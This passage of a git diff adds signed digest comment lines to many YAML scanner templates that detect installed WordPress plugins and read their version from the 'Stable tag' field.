4a0a0047304502203eb046d4bac122edc23125477764212856a12e4aec68e1fbc77e320443fc9b62022100d8e8fb9fdb3a09d9b6d4075fb2a114e2d42a5dffcc665d843eeace90d871a71b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..b7a045951b 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022022a93718a53f3a3ac396f55c641669dcbe41c45c7d6c40097ca0b408548298bb022100c5e51d9d1f22d8e2421bc7a47f29522168bda819acbfa6d35478cd81a40bf0b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..d0fa559e88 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022001b20f49339cf9fe22cd4e1baead218d4276af9a3e00f2a3f2299e71a2c1b325022100b682fdc1b697852eba154b14866fb6b1fa63d112deb123f7fb7850ab42879703:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..b182306f7e 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e56c1c05f6db1ed0418ef4287d109fef3cba879a50cca7646010950a70321da002210090b822ecd871b244a85010331dfd3e4c375e513ab5d04d220f1d561f80d0ad1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..c76755d890 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205a5ae429c3e6511264f13ebbedaf964e6e8b859aa8f6ecca9006735670ecd84c022100ce4f7438e7e09266ba15e558aab48862f75f9b5dcdc58de50fedd13dfa074a71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..eed33ee2ce 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204399661e9d91b64a617427e86035f551aff78bf021a2c52bea0ddc7ee2b286f60220120b29ba16721c7953354e86a6f78e6b1d7f25085bdcc33808e141276556ae5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..d7425aad98 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a919f726d4e9ce9842a4bab9b1e8731837b4c038ded72a6e783ddf25a55366bd02203122e75642aa4487174fd79ea96adb52614860ef165492a4294be552354d21fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..e79d3e6a43 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 480a00453043022011be58b5608ed8306d377c6961b5d174f1cb03c517378c609863e28f1c9e3f91021f261fdfe1e6a3f2f75e009effcf8427f32c202fcbcead42d2bd15f4dccf8946:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..ad77bc8f6c 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206159cffed4970cc64e93458ec1699bff0c526301819c630ceda57c760f1892d0022100c3fc2af6d9f4ff30a6b34ebb0aef91947b94a404a3b5d6fa02aeaf07b25d7998:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..4da73daab3 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202172e34fccb39b0ee440f5c2653b6d399f1fff42ac46193b61d0968c7bf2b069022100c3bf075bf6eeb69497a8a6695f93a4794e4514a575faa79ec9466250894e90cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..f95467ab6a 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203d5d44f4ff4b74ed95cf3c54fc30d1e1c6f84d55875dfd7fb28d413caa242033022100d3b8faa2380ed76ec33062b59a6c9413281af526d286e9befe71af23102f8874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..3fc4e2caf2 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 480a00453043022021b342329da02116e11db543fd957e5a2e0a400776e9fca823532254602f6ad5021f11c85ffcc3d0cae5751ecaaef2cefcc8c855df26b67f055bf17ed70bb4176b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..739e454687 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009524ac307d480d9b7f43048cb383ae8d7f6e73942322186bdf33952000dcbaab022030604dae91d9711f86155c198b8a4b8429eecccbfd9d165742e966e5c0de43d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..213c144075 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bcf621ae5eb22ba0782cf87dba752660bb0b641d30a3189bdf4acb3910d988ba0220517544fd61e02d8e9ba5d62cb92a96a530be1878614e12fa5eaf65c1a6b88eb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..8584be8149 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100955f24949ae70523673909cf2d3a7eafb3953c5dc1e5201548859c361aff5d640221009951e4d11e324a15e4d9ed01f62d7d5e3cdc50196ae331cb5c97b2bafc2ac894:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..f7a9fd831a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210092cc0fbc42afd081789bcd268bd3ab7f156ae5472ba288e905d11499d0ccd3cc0220589f826740b23a01ca87ca73bb8464ecff2dc0b8658be8dc70b4e0bc432279e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..66a705b988 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aac2fd0322dfbaa85f4404f9ae8e65fdb01d0a95c278d0ac02aac097a7f096f002202865d2a23dbefdb5331b56634ea2b89e5f02d11df8b498edbe0a3289ede725a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..ca10cb404e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb7d24d5be658291ef8a333cab81ef2c257c9907275d1b70d58914267900be5c0220568f6e172760c842d0ba241a0fb9dcdddc77b9a66dde10a6139aad20f091c20a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..6cc6d4c942 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220547782293e71b224e40adca23c17c1dadc7ac0466aff1321814b16173936991102206f3f234ba0ec4288e49ca83bfe3837403c106a25e11bb821a1b5e4b09968d8d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..cb02bc5e3f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220331d4e2002dfc93d1abe84da0eaeb11275e83e8590a560a64c6232ec669990ac02202d7734df37b87e0d1b7b1ad308ed0c0082ab552609d2fb675e53aab1c4e29dd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..5ab2312cd4 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f9e75415bb46b16ed20f118974140dd56ba11574d72e45894e17ea4a78fcf176022100e41568d665ea627c4e14946779c2498816a484f6fae909288d80523f65e11bf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..dfc9de67b1 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203eac0fcde4e714de5917052c018171eee4e506e0d90edbba3e0afdc282882283022100a9be4c4e98d1bee48ff0451f7e1d827a22f205010d006fbea8d9ca65c19ef078:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..6b2682e7d0 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e5b0d6b115127daebc1dd00fea531a41e0823be832c7fc8e32a25c15cf028ab702207c6501db73db2d3dbccef9bf9bb27ff5267c61e99db49cbe334b24c787ea2bb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..d508d803ce 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200b320f67619f0d42b3b98f4b1cffff6ce72abb1a1ae1bac514fe78d71948d4ea02200464d090ca2e194772f46e86c65c6a60e91d2ea9435cc10324b7dd455c38a855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..36ec75ea89 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ae1c1be95dfad1e14955c7207ce06ce266b8b45e15f13e83c90cf31e1185bb1702207759c1d58c4d74760bd343f130355afaa007e1f7692f696b6148c7eb6e769ddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..a547c6d5e0 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022013a9316ed662a3186a8a9fcb4952b333247d06866790df9e41b02fb168e4860c02201c676990c5b60a8df22a706c16309a3fda7ce32e6e67aeeca1d0ca909a6f19f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..43b57a314d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206acfe23c37fa2142f789e6974c8c7107a773dc62a552e149c6336db0f97ba1f902204c73ee3c89c74675c955adbb329ade400ef4bc3017d31cc64bc1e54aa0604219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..27b9f672ce 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210087be68015b00440fbc282de11607244b3b55928e82cb814e85284f441d7772560221008feace7ed5bfa3818834f107af1908cc4816347ca1d169c7a77b4d5f7c2b40cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..b58585e8bb 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cc95b5d76c817abbf83b41a3873d969d1d852402ba02e1a23d4a6e742216d8dc022025382aed1b8e6269996b2ae4f4a5b663030e861af86674ded0985445c38c66eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..fa0e2c3fd9 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009692ab26a68458f02dceefcce4d4925423670d06bea11bd0584376b69829f4c70220194e4219dccc3bb335ec61b6dd166038dec4f9bfc77c9569124cff7e60d253a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..a633ef9e0a 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220194731e67a351cbbae0154fdce9eabb2df0085d373027c644fa52b7a34ec42c902206163846ea7651bde7266a009fd7570f08ef0b4e09a3525b58c65e8d47b9531f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..a84b7643a9 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bae80353f0fb5eb68f10c6f37538f06b1859f0ce00ccc5831c91840d2077698a0221009b540bd242affd6b6181fabc955405b319ee638f6bce33ad845309cb5a97c8f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..4515dbe77c 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008a69cdc99578f17ca531c68e29820406c67d116af4b82e7d4cf0f4937502eeb7022100fbcf056290b3f5cef6f0fcd71907ebae25d1b1f8405246c42ecb23d1ba1edb1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..a15f4c8a5c 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202b106bcc0a706084c042dc80bdff6f9a98c4ee8d1b72e45cc8eb873431f5e7eb0220717f9e0a9e1a5b85eca8f61dfe56263e24990f07cc95b6678bb11ce14842336b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..02936dde28 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c5dbc8c4961406720186b89c5822c5f7ef0899639d77f77fa7dc6549e881ca8902201b049f51deab51f4316b4b7cc6470bc7d42ae44b82cea3e6b903b747756454f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..bcf46c8f1e 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022010d8aa19289ca9c78b514e55c486d87e0d345fb2cd419949153d5938404322e002210086459a9f8f2d2c78770762195a0c18ef75440034285fbf088ecc772eb171243c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..1303a274e6 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022016c84883b1e7c6fca2e7b844fcf7b06d5f6d723e1bbc057fc2a07d25e3dfd5c702204de464c9f6abb7da1615df6ce51b1302bd1e13cb1ff0228001cdfa4a67e72d44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..eb9c5b84b7 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204c857a0d344120f7153cdf32d3994d166ddfb3d0617bcb86dd8a2b0388d8705c0221008be2c740ac664f15c7d0a785c57029ad8faa1d8a8a6db037e98f33a9dfbde518:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..f12e075f4e 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d5adf07949ce503f7f61bde9880de60a0bcadae990570e4fbb45f22e029f8fef022008d977895a1a4bc59b6a8d5d9b8057fa8bc59ad4c599ec39ceace7a5f69df71c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..0383e6d58b 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022001ca0b24ff29c9fde336940b863aa33f860288cace40ff711e2029562c0da93d0220594ea656a44fdec2d2028e5fcf294601af741765f64867748589d0c9afa56605:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..72b186d6fd 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207e37859619509f365e5ccf09524902dcf94c53c54bc6c2569c38eeaa9a0d8c37022100f3051f9ad67daa2b75df6c69cb75d19a5c97bbb51aa79426ea2fc68024667610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..b18b788450 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ef87572725cb107854522b3c6e0bb09f882ed2aaa1d533999a3600a7e6af85c0220630efdbdf9dde27e7de28d6313114fbf6cbd962fd15bce3c5e87727d85cc7cbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..1b8b67ccee 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022026e18ef7f58e80e76e0adb8501de473350ac8b0973abe5282a87bcec7c85b16002207396d287c9964635d5f358a0355a7b9ab7a6426842e76a4970eb5dbedfc59e0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..501ae3437f 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200f12b8501d39ac1ebd6cdb6734b7546e96e09c163633842debb6cecfe974029402201997c1ad4e64c9b682aff6c042b3243cc5ed2bce823857e0dfe8c0111b687033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..a8c552ec42 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210082e6a3e66ec9fd5a8696bbc18e7542ea345e757e09280d9733eac640707634450221008909fe2fcb50936e038c21fa55108e797ee44e6a4b3b7f29ff069993d5819cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..4ce1c70e71 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ee0d5efebdfef7ca0da3445b481e4646a50979662117399006be28bc5b4d97a1022100bb86838eee07c7c0833a8ad84be639447e5b2de9af7d8868e7ef6311cc972030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..a18ca34acf 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fc7fd3ba5de0c5e31cac3d07d51a50dcc4b61034728a097250cd2c03ab3e86eb022100c93614290fce9171d7b98b334a77bd381022628fef3a6b99bae5b78fea42588c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 